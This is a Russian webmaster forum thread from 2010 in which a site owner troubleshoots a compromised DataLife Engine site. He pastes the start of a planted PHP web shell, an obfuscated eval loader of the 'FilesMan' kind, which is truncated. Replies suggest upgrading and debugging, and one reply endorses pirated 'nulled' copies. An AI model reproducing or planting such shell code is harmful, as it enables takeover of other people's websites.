Сайт на dle - чистый лист

Raskrutchik
На сайте с 06.12.2005
Offline
152
1135

Ни с того, ни с сего недавно сайт перестал открываться, чистый лист и все. Полазил по ftp - все на месте, измененных файлов вроде нет. Это что такое? Дыры недавно все закрывал. Двиг нуленый, не может быть так что разработчик как-то его отключил, так как при закрытии дыр я использовал файлы с офиц сайта?

Квесты в реальности (https://livequests.ru/)
$tev$
На сайте с 26.02.2010
Offline
27
#1

урл в ЛС гляну 🍿

Ragnarok
На сайте с 25.06.2010
Offline
239
#2
Raskrutchik:
Ни с того, ни с сего недавно сайт перестал открываться, чистый лист и все. Полазил по ftp - все на месте, измененных файлов вроде нет. Это что такое? Дыры недавно все закрывал. Двиг нуленый, не может быть так что разработчик как-то его отключил, так как при закрытии дыр я использовал файлы с офиц сайта?

включи отображение ошибок и попробуй открыть.

проверь базу (пароль, объем на глаз)

//TODO: перестать откладывать на потом
Raskrutchik
На сайте с 06.12.2005
Offline
152
#3
Ragnarok:
включи отображение ошибок и попробуй открыть.
проверь базу (пароль, объем на глаз)

Где включить? По моему у меня как раз ошибки выводятся, просто тут почему то белый лист. Например при заходе на /admin.php пишет

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in .../www/engine/data/config.php on line 229

Я бекап заказал от вчерашнего дня, но видимо опять взломали, думал все дыры закрыл. Месяц все тихо было. Сейчас опять. Нашел файл mysql.php в engine от 10.12.2010 с таким содержанием -

<?php
$auth_pass = "b238ee591d1179...";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62 \x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+ yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9udKhX39978Y/JTmkRs+GbnTOGJt5oShc122ngfByHetKrNO....

Raskrutchik добавил 15.12.2010 в 01:02

Все разобрался. Из за этого файла была проблема - в print.php было написано

require_once ENGINE_DIR . '/classes/mysql.php';
вот нихрена и не выводилось. Файл удалил.

Люди посоветуйте способы защиты нестандартные. Мне постоянно такие файлы заливают. DLE 7.5. Все известные дыры из паба закрыты. Доступ по ftp только по моему ip. В панели хостинга логи заходов только мои. Заливают как-то через сам сайт.

$tev$
На сайте с 26.02.2010
Offline
27
#4
Raskrutchik:

Люди посоветуйте способы защиты нестандартные. Мне постоянно такие файлы заливают. DLE 7.5. Все известные дыры из паба закрыты. Доступ по ftp только по моему ip. В панели хостинга логи заходов только мои. Заливают как-то через сам сайт.

Обновить версию движка до более актуальной, хотя бы до версии 8.3 ☝ И не нулл, а оригинал и сгенерить ключ

Raskrutchik
На сайте с 06.12.2005
Offline
152
#5
$tev$:
Обновить версию движка до более актуальной, хотя бы до версии 8.3 ☝

А смысл. Мне кажется проще закрыть все дыры текущего, чем потом новые закрывать, нет?

Ragnarok
На сайте с 25.06.2010
Offline
239
#6
Raskrutchik:
А смысл. Мне кажется проще закрыть все дыры текущего, чем потом новые закрывать, нет?

если проект серьезный, купи лицензию скрипта и перейди. надежнее будет

$tev$
На сайте с 26.02.2010
Offline
27
#7
Raskrutchik:
А смысл. Мне кажется проще закрыть все дыры текущего, чем потом новые закрывать, нет?

у меня есть пару варезников на 8.3 и пока все спокойно

если нет желания обновляться то лучше проверить еще раз все ли залатано здесь

pernatik
На сайте с 16.09.2010
Offline
26
#8
Двиг нуленый

Если качаете нулл, то качайте с известных DLE ных сайтов и не будет проблем

Любые работы по DLE
Raskrutchik
На сайте с 06.12.2005
Offline
152
#9
$tev$:
у меня есть пару варезников на 8.3 и пока все спокойно
если нет желания обновляться то лучше проверить еще раз все ли залатано здесь

Оттуда все заплатки стоят. Двигом пользуюсь уже год, проблемы начались месяц назад. Заливаются шеллы. Появляется еще один админ. Обновляться сложно, много доп модулей и все такое, лучше защиту поставить. Такая прокатит - http://www.wfound.ru/cms/dle/25359-zashhita-adminki-v-dle.html ?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий